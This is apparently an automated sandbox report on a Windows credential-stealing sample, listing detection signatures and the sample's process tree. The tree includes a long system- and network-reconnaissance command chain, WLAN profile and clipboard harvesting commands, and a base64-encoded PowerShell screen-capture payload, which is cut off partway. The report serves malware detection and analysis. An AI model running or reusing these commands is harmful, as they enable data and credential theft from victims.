Edit tour
Windows
Analysis Report
RuntimeusererVers.exe
Overview
General Information
Detection
Python Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Python Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
- RuntimeusererVers.exe (PID: 7988 cmdline:
"C:\Users\ user\Deskt op\Runtime usererVers .exe" MD5: 4FD34971F2551E33806360BA5EE86E5E) - conhost.exe (PID: 8000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RuntimeusererVers.exe (PID: 8168 cmdline:
"C:\Users\ user\Deskt op\Runtime usererVers .exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F) - cmd.exe (PID: 884 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 7356 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - tasklist.exe (PID: 7404 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 1424 cmdline:
C:\Windows \system32\ cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1436 cmdline:
C:\Windows \system32\ cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 7740 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - tasklist.exe (PID: 5916 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6328 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe Get -Clipboard " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 5884 cmdline:
powershell .exe Get-C lipboard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 6088 cmdline:
C:\Windows \system32\ cmd.exe /c "echo ### #System In fo#### & s ysteminfo & echo ### #System Ve rsion#### & ver & ec ho ####Hos t Name#### & hostnam e & echo # ###Environ ment Varia ble#### & set & echo ####Logic al Disk### # & wmic l ogicaldisk get capti on,descrip tion,provi dername & echo ####U ser Info## ## & net u ser & echo ####Onlin e User#### & query u ser & echo ####Local Group#### & net loc algroup & echo ####A dministrat ors Info## ## & net l ocalgroup administra tors & ech o ####Gues t User Inf o#### & ne t user gue st & echo ####Admini strator Us er Info### # & net us er adminis trator & e cho ####St artup Info #### & wmi c startup get captio n,command & echo ### #Tasklist# ### & task list /svc & echo ### #Ipconfig# ### & ipco nfig/all & echo #### Hosts#### & type C:\ WINDOWS\Sy stem32\dri vers\etc\h osts & ech o ####Rout e Table### # & route print & ec ho ####Arp Info#### & arp -a & echo #### Netstat### # & netsta t -ano & e cho ####Se rvice Info #### & sc query type = service state= all & echo ## ##Firewall info#### & netsh fir ewall show state & n etsh firew all show c onfig" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - systeminfo.exe (PID: 2600 cmdline:
systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD) - WmiPrvSE.exe (PID: 8024 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - HOSTNAME.EXE (PID: 7460 cmdline:
hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0) - WMIC.exe (PID: 1836 cmdline:
wmic logic aldisk get caption,d escription ,providern ame MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - net.exe (PID: 4428 cmdline:
net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 1568 cmdline:
C:\Windows \system32\ net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - query.exe (PID: 3888 cmdline:
query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45) - quser.exe (PID: 6284 cmdline:
"C:\Window s\system32 \quser.exe " MD5: 480868AEBA9C04CA04D641D5ED29937B) - net.exe (PID: 2044 cmdline:
net localg roup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 3324 cmdline:
C:\Windows \system32\ net1 local group MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - net.exe (PID: 2092 cmdline:
net localg roup admin istrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 2180 cmdline:
C:\Windows \system32\ net1 local group admi nistrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - net.exe (PID: 4252 cmdline:
net user g uest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 2800 cmdline:
C:\Windows \system32\ net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - net.exe (PID: 2896 cmdline:
net user a dministrat or MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7232 cmdline:
C:\Windows \system32\ net1 user administra tor MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - WMIC.exe (PID: 7408 cmdline:
wmic start up get cap tion,comma nd MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - tasklist.exe (PID: 5292 cmdline:
tasklist / svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - ipconfig.exe (PID: 4332 cmdline:
ipconfig / all MD5: 62F170FB07FDBB79CEB7147101406EB8) - ROUTE.EXE (PID: 6004 cmdline:
route prin t MD5: 3C97E63423E527BA8381E81CBA00B8CD) - ARP.EXE (PID: 6164 cmdline:
arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98) - NETSTAT.EXE (PID: 6448 cmdline:
netstat -a no MD5: 7FDDD6681EA81CE26E64452336F479E6) - sc.exe (PID: 1240 cmdline:
sc query t ype= servi ce state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - netsh.exe (PID: 1412 cmdline:
netsh fire wall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - netsh.exe (PID: 6864 cmdline:
netsh fire wall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 5228 cmdline:
C:\Windows \system32\ cmd.exe /c "netsh wl an show pr ofiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - netsh.exe (PID: 6036 cmdline:
netsh wlan show prof iles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 1708 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - WMIC.exe (PID: 8164 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 4780 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe -No Profile -E xecutionPo licy Bypas s -Encoded Command JA BzAG8AdQBy AGMAZQAgAD 0AIABAACIA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtADsA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtAC4A QwBvAGwAbA BlAGMAdABp AG8AbgBzAC 4ARwBlAG4A ZQByAGkAYw A7AA0ACgB1 AHMAaQBuAG cAIABTAHkA cwB0AGUAbQ AuAEQAcgBh AHcAaQBuAG cAOwANAAoA dQBzAGkAbg BnACAAUwB5 AHMAdABlAG 0ALgBXAGkA bgBkAG8Adw BzAC4ARgBv AHIAbQBzAD sADQAKAA0A CgBwAHUAYg BsAGkAYwAg AGMAbABhAH MAcwAgAFMA YwByAGUAZQ BuAHMAaABv AHQADQAKAH sADQAKACAA IAAgACAAcA B1AGIAbABp AGMAIABzAH QAYQB0AGkA YwAgAEwAaQ BzAHQAPABC AGkAdABtAG EAcAA+ACAA QwBhAHAAdA B1AHIAZQBT AGMAcgBlAG UAbgBzACgA KQANAAoAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAdg BhAHIAIABy AGUAcwB1AG wAdABzACAA PQAgAG4AZQ B3ACAATABp AHMAdAA8AE IAaQB0AG0A YQBwAD4AKA ApADsADQAK ACAAIAAgAC AAIAAgACAA IAB2AGEAcg AgAGEAbABs AFMAYwByAG UAZQBuAHMA IAA9ACAAUw BjAHIAZQBl AG4ALgBBAG wAbABTAGMA cgBlAGUAbg BzADsADQAK AA0ACgAgAC AAIAAgACAA IAAgACAAZg BvAHIAZQBh AGMAaAAgAC gAUwBjAHIA ZQBlAG4AIA BzAGMAcgBl AGUAbgAgAG kAbgAgAGEA bABsAFMAYw ByAGUAZQBu AHMAKQANAA oAIAAgACAA IAAgACAAIA AgAHsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHQAcgB5 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAF IAZQBjAHQA YQBuAGcAbA BlACAAYgBv AHUAbgBkAH MAIAA9ACAA cwBjAHIAZQ BlAG4ALgBC AG8AdQBuAG QAcwA7AA0A CgAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHUAcw BpAG4AZwAg ACgAQgBpAH QAbQBhAHAA IABiAGkAdA BtAGEAcAAg AD0AIABuAG UAdwAgAEIA aQB0AG0AYQ BwACgAYgBv AHUAbgBkAH MALgBXAGkA ZAB0AGgALA AgAGIAbwB1 AG4AZABzAC 4ASABlAGkA ZwBoAHQAKQ ApAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg AHsADQAKAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAB1AHMAaQ BuAGcAIAAo AEcAcgBhAH AAaABpAGMA cwAgAGcAcg BhAHAAaABp AGMAcwAgAD 0AIABHAHIA YQBwAGgAaQ BjAHMALgBG AHIAbwBtAE kAbQBhAGcA ZQAoAGIAaQ B0AG0AYQBw ACkAKQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgAGcA cgBhAHAAaA BpAGMAcwAu AEMAbwBwAH kARgByAG8A bQBTAGMAcg BlAGUAbgAo AG4AZQB3AC AAUABvAGkA bgB0ACgAYg BvAHUAbgBk AHMALgBMAG UAZgB0ACwA IABiAG8AdQ BuAGQAcwAu AFQAbwBwAC kALAAgAFAA bwBpAG4AdA AuAEUAbQBw AHQAeQAsAC AAYgBvAHUA bgBkAHMALg BTAGkAegBl ACkAOwANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAH0ADQ AKAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAcgBlAHMA dQBsAHQAcw AuAEEAZABk ACgAKABCAG kAdABtAGEA cAApAGIAaQ B0AG0AYQBw AC4AQwBsAG 8AbgBlACgA KQApADsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAYwBh AHQAYwBoAC AAKABFAHgA YwBlAHAAdA